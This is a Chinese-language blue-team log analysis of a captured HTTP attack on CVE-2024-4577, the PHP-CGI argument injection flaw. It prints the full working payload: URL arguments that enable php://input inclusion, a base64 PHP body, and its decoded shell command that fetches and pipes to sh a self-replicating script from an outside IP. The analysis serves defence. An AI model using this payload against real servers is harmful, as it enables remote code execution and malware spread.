WEB安全--蓝队日志--RCE数据包分析

一、分析数据包内容

攻击者通过URL请求+POST传参的方式试图绕过IPS测试RCE漏洞的利用

URL请求中的内容进行urlcode解码后是这样的:

复制代码
http://资产IP/hello.world?-d allow_url_include=1 -d auto_prepend_file=php://input
1. -d allow_url_include=1
  • 使用 PHP 的 -d 命令行参数,在执行时动态设置配置项
  • allow_url_include=1:启用从 URL 包含文件的功能,这通常在 php.ini 是禁用的。
  • 它允许 include()require() 加载远程地址,如 http://attacker.com/shell.txt
2. -d auto_prepend_file=php://input
  • 这个设置使 PHP 在解析主脚本之前,自动包含一个文件
  • 这里指定的文件是 php://input,也就是HTTP 请求体(POST data)中的原始输入流
  • 也就是说可以直接包含POST中的数据并执行

然后再结合POST传递的内容分析:

请求体中的内容是:

复制代码
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNC4yNDUuMjQwLjI4L3NoIHx8IHdnZXQgaHR0cDovL
zEwNC4yNDUuMjQwLjI4L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA=="));
echo(md5("Hello CVE-2024-4577")); ?>

其中base64字段解码后:

复制代码
<?php shell_exec( X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); 
echo "$X" | sh -s cve_2024_4577.selfrep);

echo(md5("Hello CVE-2024-4577")); ?>

这条命令的目的是利用远程代码执行漏洞(RCE)来从远程服务器下载一个脚本并执行它,而它特别指向了一个命名为 cve_2024_4577.selfrep 的 payload,表明攻击者试图利用 2024 年披露的某个 CVE(CVE-2024-4577)漏洞,进行进一步的自动传播或感染操作

二、判断攻击者的目的

1、通过GET参数-d开启allow_url_include=1和auto_prepend_file=php://input

其目的是执行POST传递的数据流

2、POST注入恶意PHP脚本,内容为:

使用shell_exec()执行shell命令

复制代码
X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); echo "$X" | sh -s cve_2024_4577.selfrep

通过curl或wget访问攻击者远程搭建的服务器中104.245.240.28中的sh文件

把内容赋值给X

将X的值通过管道符传递给靶机本地sh执行

-s cve_2024_4577.selfrep 表明传递一个参数给脚本,脚本内部可能会根据这个参数执行

3、然后通过echo(md5("Hello CVE-2024-4577")); 输出一个hash,用于回显检测是否成功执行。

相关推荐
碳水加碳水3 小时前
Java代码审计实战:XML外部实体注入(XXE)深度解析
java·安全·web安全·代码审计
打码人的日常分享8 小时前
运维服务方案,运维巡检方案,运维安全保障方案文件
大数据·运维·安全·word·安全架构
WhoisXMLAPI9 小时前
WhoisXML API再次荣登2025年美国Inc. 5000快速成长企业榜单
网络·安全
lingggggaaaa12 小时前
小迪安全v2023学习笔记(七十九讲)—— 中间件安全&IIS&Apache&Tomcat&Nginx&CVE
笔记·学习·安全·web安全·网络安全·中间件·apache
无线图像传输研究探索16 小时前
无定位更安全:5G 高清视频终端的保密场景适配之道
5g·安全·音视频·无人机·5g单兵图传·单兵图传·无人机图传
喜欢你,还有大家16 小时前
SSH服务远程安全登录
运维·安全·ssh
淮北49416 小时前
计算机网络学习(七、网络安全)
学习·计算机网络·web安全
爱隐身的官人18 小时前
新后端漏洞(上)- Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
网络·安全·web安全·spel表达式注入命令执行
星马梦缘18 小时前
计算机网络7 第七章 网络安全
网络·计算机网络·安全·web安全·非对称加密·对称加密
weixin_4462608518 小时前
探索网络安全的利器:theHarvester
安全·web安全